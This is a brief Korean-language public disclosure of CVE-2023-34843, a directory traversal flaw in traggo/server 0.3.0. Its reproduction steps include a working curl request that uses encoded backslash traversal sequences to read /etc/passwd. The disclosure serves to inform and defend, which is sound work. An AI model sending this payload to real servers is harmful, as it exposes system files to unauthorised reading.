
CVE-2023-34843에 대한 공개 제보.
CVE-2023-34843 공개
traggo/server 버전 0.3.0은 디렉토리 트래버설에 취약합니다.
재현 단계:
엔드포인트/서버에 traggo/server를 설치하세요. https://traggo.net/install/
다음 URL로 GET 요청을 보내세요. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
/etc/passwd의 내용을 확인하세요.